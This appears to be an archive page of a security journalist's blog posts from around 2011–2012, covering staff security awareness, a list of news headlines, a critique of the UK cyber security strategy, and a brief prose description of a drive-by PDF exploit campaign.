Whenever there’s a security incident, two things happen:
- security vendors scream, ‘it happened because they weren’t using our product, so clearly you should or it will happen to you’
- governments scream, ‘we need to enact the Cybersecurity Act/CISPA/Communications Bill/delete-as-applicable/and substitute-at-will in order to protect you, you-know-it-makes-sense’
Both have an axe to grind, and grind it they will. The only group that doesn’t have an axe is the poor bloody CISO working away at the coalface; underfunded, overworked and making do – and it’s a welcome relief to hear what it’s actually doing.
Wisegate recently published a paper on CISO discussions between themselves. It followed an earlier analysis that showed a major, if not the major, threat that concerns them is their own staff awareness – or lack of awareness – about cyber security issues. This actually makes a lot of sense. Trend Micro’s study towards the end of 2012 showed that more than 90% of successful APT attacks start with spear-phishing. Spear-phishing is harmless until the target clicks on a link or opens an attachment – so if you can teach staff how to avoid being phished, then you immediately avoid possibly the most serious threat of today.
The only way you can do that is by increasing user awareness – and Wisegate’s paper, CISOs Share Innovative & Practical Ways to Improve Security Awareness, tells us how CISOs are actually tackling the problem. It’s worth reading, so I won’t give everything away here – except perhaps to point out that one of the biggest problems is silo security; the users’ view of an unapproachable arbiter of what the user can and cannot do… That needs to go. And the Wisegate report gives useful pointers on how to do it.
You can download the report from here
My news stories on Infosecurity Magazine from Tuesday 10 April until Friday 13 April, and Monday 16 April until Wednesday 18 April
NHS needs a security czar to prevent continuous data walkabout
While the South London Healthcare NHS Trust signs a Data Protection Undertaking, the security industry wonders why we have learnt nothing in the last two years – and calls for a new NHS data protection czar.
18 April 2012
PwC 2012 Information Security Breaches Survey: Preliminary findings report continued mobile insecurity
New statistics show that while many companies appear to understand the business threat from BYOD, many others are taking no precautions whatsoever.
18 April 2012
(ISC)² launches its new EMEA advisory board
In a move designed to offer genuine hands-on security experience to EMEA’s different security initiatives, professional body (ISC)² has launched a new Advisory Board for Europe, the Middle East and Africa (EAB).
18 April 2012
Google co-founder worries about the future of the internet
In an interview with the Guardian, the co-founder of Google lists the threats facing the future vitality of the internet.
17 April 2012
Shadowserver uncovers campaign against Vietnam in Hardcore Charlie’s file dump
An analysis of the hacked files dumped by hacker Hardcore Charlie fails to prove Chinese culpability, but finds evidence of ‘yet another cyber espionage campaign against Vietnam.’
17 April 2012
Iranian software manager hacks and dumps card details of 3m Iranians
Khosrow Zarefarid found and reported a flaw in the Iranian POS system. He reported it, but was ignored – so he used it and hacked 3 million Iranian debit card details.
17 April 2012
Dutch Pirate Party forced to take its Pirate Bay proxy off-line
In a move that will be monitored by the UK’s music industry association (BPI), its Dutch equivalent BREIN (translates as ‘Brain’) has obtained a court injunction forcing the political party, the Pirate Party, to take down the proxy site that was allowing users to continue using the blocked Pirate Bay (TPB).
16 April 2012
Is ACTA dead in the water, or is it resurfacing via the G8?
David Martin, European Parliament’s rapporteur on the ACTA treaty, is expected to recommend that parliament should reject ACTA. Does this mean the end for the Anti-Counterfeiting Trade Agreement?
16 April 2012
Commotion Wireless: an open source censorship buster
The great contradiction in modern techno-politics is the need for democracies to promulgate free speech in other countries while controlling it in their own.
16 April 2012
Boston police release unredacted Facebook data of ‘Craigslist killer’
The complete Facebook account of Philip Markoff, in hard copy and including friend IDs, was given by the Boston Police to the Boston Phoenix newspaper.
13 April 2012
EC asks how we would want the internet of things to be controlled
The European Commission (EC) has issued an online ‘consultation’ document: How would you envisage ‘governance’ of the ‘Internet of Things’?
13 April 2012
City trader fined £450,000 by the FSA
“For the reasons given in this Notice…”, says an FSA Decision Notice, “…the FSA has decided to impose on Mr Ian Charles Hannam a financial penalty of £450,000.”
13 April 2012
MPAA’s attempted takedown of Hotfile gets more and more difficult
Don’t throw the baby out with the bathwater says Google; and there’s more baby than bathwater suggests Prof. James Boyle.
12 April 2012
UK private members bill designed to censor pornography on the internet
Baroness Howe of Ildicote has introduced the Online Safety Act 2012, designed to force ISPs to install and operate pornography filters.
12 April 2012
Financial services the target in massive DDoS increase
A new analysis from Prolexic shows a huge increase in DDoS attacks, largely sourced in Asia and primarily attacking financial institutions.
12 April 2012
Smartphones are still firmly ‘enterprise-unready’
Research from by Altimeter Group, Bloor Research and Trend Micro shows that the ‘consumer marketing’ legacy of many smartphones makes them ill-equipped to meet enterprise security demands.
11 April 2012
EU trade committee’s draft opinion on ACTA: Don’t ratify
The European Parliament’s Industry, Research and Energy committee for the Committee on International Trade has published its draft opinion on ACTA. Don’t ratify, it tells parliament.
11 April 2012
DHS gets California company to hack game consoles
In a project that started from law enforcement agencies’ request to the US Department of Homeland Security (DHS), which was then farmed out to the US Navy, Obscure Technologies of California has been awarded a contract to find ways of hacking game consoles.
11 April 2012
Real-time data mining comes to Twitter
Twitter is usually described as a micro-blogging social network. To many who monitor its ‘trending topics’ it is also an early warning news service, frequently pointing users to breaking news before the traditional news media reports it.
10 April 2012
Iran bids farewell to the internet; welcomes its own halal intranet
Iran’s answer to ‘criminality’ on the internet is not to fight criminality, but to block the internet. In the future, Iranians will have access to only the official national intranet and a whitelist of acceptable foreign sites.
10 April 2012
What an Englishman does in bed
Companies that monitor the end point behavior of their remote workers will have to start monitoring their (internet) behavior in bed. That at least is the inference to be drawn from a new street survey conducted by Infosecurity Europe.
10 April 2012
“The UK will become the best country in the world for e-commerce, the prime minister has promised.” His promise includes “a raft of measures to boost internet use in the UK, including a £1bn drive to get all government services online [within three years] and £15m to help businesses make the most of the web.”
This is not from the new UK cyber security strategy published by the Cabinet Office last week. It came from Tony Blair in 2002. And it didn’t happen.
Last week, the Cabinet Office explained that “Our vision is for the UK in 2015 to derive huge economic and social value from a vibrant, resilient and secure cyberspace, where our actions, guided by our core values of liberty, fairness, transparency and the rule of law, enhance prosperity, national security and a strong society.”
Cameron is perhaps less ambitious than Blair, allows more time (four rather than three years) and is focused on security. But is the end any more achievable?
I doubt it – and offer a few observations. Firstly, by far the majority of security companies and their experts have openly welcomed and praised this report. They have no option. The power of government purchasing makes it difficult for any business to openly criticise government. Indeed, the report acknowledges this lever:
To ensure smaller companies can play their part as drivers of new ideas and innovation we will bring forward proposals as part of the Growth Review to help small and medium sized enterprises fully access the value of public procurement.
However, regardless of what they say in public, many of these security experts have serious doubts. One, whose company statement had him praising the initiative, privately mailed me worrying about how many different government departments, quangos, committees, off-shoots and different law enforcement and intelligence agencies are involved in this strategy. It is always the joint that provide weaknesses, and this strategy has many joints.
The second observation, which to his credit, has also been highlighted by Amichai Shulman, CTO and co-founder of Imperva, is that there is no emphasis on protecting the individual.
The strategy has given only a few insights on how government is going to help businesses and individuals protect themselves. In fact, it has taken the traditional approach of non-intrusive, general advisor for tasks left to the individuals to do, e.g., keep safe and stay current with the latest threats. As we know, most consumers and enterprises don’t do that which explains why we’re in the cyber crime mess we live in today.
Amichai Shulman, Imperva
It would appear from the report that the government expects its GetSafeOnline website to be sufficient to protect the public. (You can see my attitude to GetSafeOnline here: UK Internet Security: State of the Nation – The Get Safe Online Report, November 2011.) I have serious doubts about its effectiveness. But I am more concerned there is no mention anywhere in the new cyber security strategy report of an existing CPNI-inaugurated initiative that has the potential to help the individual: the Warning Advice and Reporting Point, or WARP.
The WARP project is stagnating if not contracting. But the concept is still good. Given the right input and impetus WARPs could develop into a form of security-based social networking system, where individuals would share threat experiences between themselves, learn about new threats, and automatically report them back up the line eventually to CPNI. By sharing their information, by warning others, by offering help and advice to colleagues within any particular WARP, the individual security stance becomes much stronger.
This approach could help protect home computers from being recruited into botnets; and fewer active botnets means a more secure national infrastructure. I am worried that if the new strategy isn’t aimed at protecting the NI by protecting the individuals, how else is it to do it? Possibly by ramping up co-operation with and control over the ISPs. We will, says the report
Seek agreement with Internet Service Providers (ISPs) on the support they might offer to internet users to help them identify, address, and protect themselves from malicious activity on their systems.
It is too easy to move from this position to one of getting the ISPs to cut off infected users until they can prove their system is clean.
But it’s not all depressing; I have always known that there are comedians in government. Always leave them laughing when you say goodbye. And this report does just that:
- the Ministry of Justice will develop ‘cyber-tags’ as a form of online ASBO
- police forces are to recruit ‘cyber-specials’ (the internet traffic warden?)
- ‘kitemarks’ to help consumers distinguish between genuinely helpful products and advice and the purveyors of ‘scareware’.
- “…partnerships between the public and private sectors to share information on threats, manage cyber incidents, develop trend analysis and build cyber security capability and capacity.”
CESG share intelligence with the private sector? Now that one really made me laugh.
Mark this day and keep it clear: Tuesday 27 September. That’s this coming Tuesday. It’s the day of Infosecurity’s Autumn Virtual Conference. And it’s packed full of goodies: secure software development, responsible breach disclosure, tablets in the enterprise, governance and compliance, e-crime, a career in security and, of course, APTs.
And the speakers! Marc van Zadelhoff, Director of Strategy at IBM Security Solutions; Professor John Walker; Microsoft’s Jeremy Dallman; Raj Samani, Strategy Advisor for the Cloud Security Alliance and CTO EMEA at McAfee; Chenxi Wang from Forrester; Paul Simmonds, co-founder of the Jericho Forum; and many more.
Oh yes. And me. E-crime. 11:00am. 27 September. Be there.
I was talking to Amit Klein, the CTO of Trusteer, because I wanted a better understanding of how Rapport works. Rapport is Trusteer’s anti-banking trojan product. It’s free if your bank is a participating bank. The product prevents online bank transaction fraud; so it saves the banks money. If it saves the banks money, it is only fair that they pay for it. You get it free.
It works by protecting your browser. It recognises worrying behaviour and stops it. So, if I’m infected with Zeus (or some other bank trojan) and start an online bank transaction, Rapport sees Zeus trying to interfere and steps in to protect me.
Ah, I said. OK, you can protect my browser/bank interaction; but what if I’ve got a completely separate root-kit infection that doesn’t try to interfere with the transaction, just tries to steal my credentials?
Amit was very polite. He said, “We will protect your credentials when you’re online to your bank. But if you leave them lying around in some file on your computer…”
What he was saying was that security software can do what it is designed to do: but no software can protect against user stupidity. And that’s something we sometimes forget. We can install all the security we want: it won’t work if we forget to teach our users about security awareness.
PricewaterhouseCoopers LLP (PwC) has published a new report: Security awareness: Turning your people into your first line of defence. Our current strategy, says PwC,
has been very strongly biased to improving protection, reducing risks and mitigating issues by further investment in technology; solving what is perceived to be a technical issue with a technical solution.
But it clearly isn’t working since
financial losses due to cyber-crime continue to grow and despite major steps forward in technical defences such as anti-malware and authentication systems, credit card fraud and online fraud continue to increase and identity theft is an everyday occurrence.
So PwC starts to look elsewhere, and its eye falls on the user:
According to the Computer Security Institute’s Computer Crime and Security Survey as much as 25% of respondents said more than 60% of financial losses came from accidental breaches by insiders, not external hacks. The survey also identified that less than 1% of security budgets are allocated to awareness training.
This, then, is the solution:
What is required is a new approach in which an investment in understanding and influencing the behaviours of all those concerned is balanced against the continued investment in technology and processes…
…Your people are your first line of defence and with their full support, as part of a balanced programme of protective measures, you will be well placed to mitigate the information risks facing your organisation.
Well, you won’t get any argument here! See
This latter article adds an additional argument to PwC’s thesis:
It is not that security professionals cause break-ins, but there is little doubt in my mind that, by raising the bar, we are cultivating smarter, more sophisticated and more effective forms of attack. Much as the excessive and inappropriate use of antibiotics often results in more virulent drug-resistant microbes, so we are seeing the growth of highly-professional technically-brilliant attackers against systems that have been well protected against earlier malware.
C. Warren Axelrod
In other words, being reliant on technology for your security solutions is like chasing your own tail: you’ll just end up going faster and faster getting nowhere. Nevertheless, there is a hidden danger in PwC’s report. It is this: many security experts simply do not believe that it is possible to educate users sufficiently for them to behave securely. Consider this tweet from one of the world’s leading security researchers, Dancho Danchev:
The link, incidentally, is to an article in SC about the PwC report; which you don’t need to read because you’re already reading this :-)
But seriously. If you don’t believe that your users can regulate their own behaviour, what is left? You do it for them. You restrict them. You monitor them. You control them. You protect them from themselves.
You can justify this because they are your employees paid by you and working for your company. But just like the society that New Labour created all around us is a mirror of 1984, so this route will be 1984 writ small within your own organization. You may gain a little security but it will be at the cost of the staff sense of liberty and empowerment that leads to content, innovation, active involvement, happiness, and a low staff turnover. And it won’t really work; because you’ll be reverting to that very technological solution that hasn’t worked yet.
So the message you must take from the PwC report is exactly the one they suggest: empower your staff to behave securely; but never shackle them into it.
If loaded, the JS redirects to a page on several different web servers, which in turn loads a hidden iframe before redirecting again to a Canadian pharmacy website. The iframe contains the malware:
This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.
The exploits install an executable named game.exe which we have not yet analyzed and is not detected by many anti virus products.
Once again we see the importance of user awareness: your anti-malware security software might not protect you; but it won’t need to if you simply don’t click on unexpected attachments.